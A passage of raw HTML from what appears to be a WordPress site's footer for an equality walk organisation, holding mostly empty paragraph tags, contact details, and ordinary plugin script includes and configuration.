>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</section>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col last\"/></footer>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script 